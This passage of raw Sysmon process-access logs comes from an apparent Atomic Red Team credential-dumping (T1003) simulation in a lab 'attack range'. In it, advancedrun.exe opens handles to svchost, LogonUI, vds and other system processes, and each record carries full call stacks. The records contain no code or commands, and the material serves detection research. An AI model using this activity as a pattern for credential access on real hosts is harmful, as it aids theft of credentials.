n.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943820Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943819Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943818Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943817Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943816Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943815Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943814Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943813Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943812Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943811Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003943810Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943809Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943808Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943807Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943806Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943805Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943804Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
